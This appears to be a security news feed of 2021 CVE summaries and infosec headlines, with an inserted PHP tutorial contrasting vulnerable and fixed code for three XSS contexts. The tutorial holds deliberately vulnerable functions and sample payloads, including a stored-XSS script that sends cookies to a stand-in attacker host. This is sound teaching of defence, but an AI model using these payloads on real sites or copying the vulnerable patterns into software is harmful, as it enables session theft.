‼ CVE-2021-42664 ‼
📖 Read
via "National Vulnerability Database".
A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the (1) quiz title and (2) quiz description parameters to add_quiz.php. An attacker can leverage this vulnerability to run JavaScript in the browser of any user who views the stored content, which can lead to cookie theft and more.
‼ CVE-2021-42668 ‼
📖 Read
via "National Vulnerability Database".
A SQL Injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the id parameter in the my_classmates.php web page. As a result, an attacker can extract sensitive data from the backend database and, in some cases, use this vulnerability to gain remote code execution on the web server.
‼ CVE-2021-42665 ‼
📖 Read
via "National Vulnerability Database".
An SQL Injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the login form in index.php, which can allow an attacker to bypass authentication.
‼ CVE-2021-42670 ‼
📖 Read
via "National Vulnerability Database".
A SQL injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the id parameter to the announcements_student.php web page. As a result, a malicious user can extract sensitive data from the backend database and, in some cases, use this vulnerability to gain remote code execution on the web server.
🦿 Voice phishing attack spoofs Amazon to steal credit card information 🦿
📖 Read
via "Tech Republic".
Impersonating an Amazon order notification, the attackers end up calling victims to try to obtain their credit card details, says Avanan.
🗓️ Cisco patches critical bug trio in Policy Suite and ONT networking devices 🗓️
📖 Read
via "The Daily Swig".
Critical severity bugs disclosed by networking titan
❌ Proofpoint Phish Harvests Microsoft O365, Google Logins ❌
📖 Read
via "Threat Post".
A savvy campaign impersonating the cybersecurity company skated past Microsoft email security.
🕴 To Secure DevOps, Security Teams Must be Agile 🕴
📖 Read
via "Dark Reading".
The evolution of agile development and infrastructure-as-code has given security teams the tools they need to gain visibility, find vulnerabilities early, and continuously evaluate infrastructure.
🗓️ Lessons learned: How a severe vulnerability in the OWASP ModSecurity Core Rule Set sparked much-needed change 🗓️
📖 Read
via "The Daily Swig".
Years-old WAF bypass flaw was discovered in June
❌ Google Ads for Faux Cryptowallets Net Scammers At Least $500K ❌
📖 Read
via "Threat Post".
Malicious Phantom, MetaMask cryptowallets are on the prowl to drain victim funds.
🦿 US government unveils $10 million bounty for DarkSide ransomware gang leaders 🦿
📖 Read
via "Tech Republic".
The $10 million is for intel that leads to the identification or location of anyone who holds a leadership position in the DarkSide group.
‼ CVE-2021-3924 ‼
📖 Read
via "National Vulnerability Database".
grav is vulnerable to Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
‼ CVE-2021-3928 ‼
📖 Read
via "National Vulnerability Database".
vim is vulnerable to Stack-based Buffer Overflow
‼ CVE-2021-3916 ‼
📖 Read
via "National Vulnerability Database".
bookstack is vulnerable to Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
‼ CVE-2021-39412 ‼
📖 Read
via "National Vulnerability Database".
Multiple Cross Site Scripting (XSS) vulnerabilities exist in PHPGurukul Shopping v3.1 via the (1) callback parameter in (a) server_side/scripts/id_jsonp.php, (b) server_side/scripts/jsonp.php, and (c) scripts/objects_jsonp.php, the (2) value parameter in examples_support/editable_ajax.php, and the (3) PHP_SELF parameter in captcha/index.php.
‼ CVE-2021-3927 ‼
📖 Read
via "National Vulnerability Database".
vim is vulnerable to Heap-based Buffer Overflow
‼ CVE-2021-39411 ‼
📖 Read
via "National Vulnerability Database".
Multiple Cross Site Scripting (XSS) vulnerabilities exist in PHPGurukul Hospital Management System 4.0 via the (1) searchdata parameter in (a) doctor/search.php and (b) admin/patient-search.php, and the (2) fromdate and (3) todate parameters in admin/betweendates-detailsreports.php.
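The XSS entries on this page (the stored quiz title/description in CVE-2021-42664, the JSONP `callback` and `PHP_SELF` reflections in CVE-2021-39412, and the reflected search and date parameters in CVE-2021-39411) cover three distinct output contexts, and each needs a different fix. The PHP below is an added illustration of those contexts, not code from PHPGurukul, Sourcecodester or the advisories; the function names, the payloads and the `attacker.example` host are constructed for the demo.

```php
<?php
// Added illustration of the three XSS contexts named in the advisories above;
// not code from PHPGurukul or Sourcecodester. Function names and payloads are
// constructed for the demo.

// 1. HTML body context: a stored quiz title or a reflected search parameter is
//    written into the page. Escape for HTML at output time, every time.
function render_quiz_vulnerable(string $title, string $description): string {
    return "<h2>$title</h2><p>$description</p>";
}
function render_quiz_fixed(string $title, string $description): string {
    $t = htmlspecialchars($title, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $d = htmlspecialchars($description, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<h2>$t</h2><p>$d</p>";
}

// 2. JSONP callback context: the response body is JavaScript, so HTML escaping
//    is the wrong tool. Restrict the callback to a plain identifier and serve a
//    non-HTML content type so a browser will not render it as a page.
function jsonp_vulnerable(string $callback, array $data): string {
    return $callback . '(' . json_encode($data) . ');';
}
function jsonp_fixed(string $callback, array $data): ?string {
    if (!preg_match('/\A[A-Za-z_$][A-Za-z0-9_$.]{0,63}\z/', $callback)) {
        return null;  // caller responds with HTTP 400
    }
    // In a real handler, also send:
    //   header('Content-Type: application/javascript; charset=utf-8');
    //   header('X-Content-Type-Options: nosniff');
    return $callback . '(' . json_encode($data) . ');';
}

// 3. HTML attribute context: $_SERVER['PHP_SELF'] includes attacker-controlled
//    path info, so echoing it into a form action is reflected XSS. Escape it,
//    or better, hard-code the action path.
function form_action_vulnerable(string $phpSelf): string {
    return '<form action="' . $phpSelf . '" method="post">';
}
function form_action_fixed(string $phpSelf): string {
    $safe = htmlspecialchars($phpSelf, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<form action="' . $safe . '" method="post">';
}

// Constructed payloads, one per context.
$stored = '<script>location="https://attacker.example/?c="+document.cookie</script>';
echo render_quiz_vulnerable($stored, 'intro'), "\n";
echo render_quiz_fixed($stored, 'intro'), "\n";

$cb = '<script>alert(1)</script>';
echo jsonp_vulnerable($cb, ['ok' => true]), "\n";
var_dump(jsonp_fixed($cb, ['ok' => true]));
echo jsonp_fixed('handleData', ['ok' => true]), "\n";

$self = '/captcha/index.php/"><script>alert(1)</script>';
echo form_action_vulnerable($self), "\n";
echo form_action_fixed($self), "\n";
```

Run it with `php demo.php` and compare each vulnerable/fixed pair: the HTML-context fixes turn `<`, `>` and quotes into entities so the payload is displayed rather than executed; the JSONP fix refuses the script-tag callback and only emits the identifier-shaped one. The stored case is the most dangerous of the three because the payload fires for every later visitor, not just the one who followed a crafted link, which is what the cookie-theft wording in the CVE-2021-42664 entry refers to.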
🛠 Faraday 3.18.1 🛠
📖 Read
via "Packet Storm Security".
Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.
❌ Beyond the Basics: Tips for Building Advanced Ransomware Resiliency ❌
📖 Read
via "Threat Post".
Joseph Carson, chief security scientist and advisory CISO at ThycoticCentrify, offers advice on least privilege, automation, application control and more.
❌ BrakTooth Bluetooth Bugs Bite: Exploit Code, PoC Released ❌
📖 Read
via "Threat Post".
CISA is urging vendors to patch, given the release of public exploit code & a proof of concept tool for bugs that open billions of devices – phones, PCs, toys, etc. – to DoS & code execution.
🔏 Friday Five 11/5 🔏
📖 Read
via "Digital Guardian".
The U.S. blacklists four companies for malicious cyber activities, a ransomware group shuts down, and a new CMMC program gets revamped - catch up on the infosec news of the week with the Friday Five!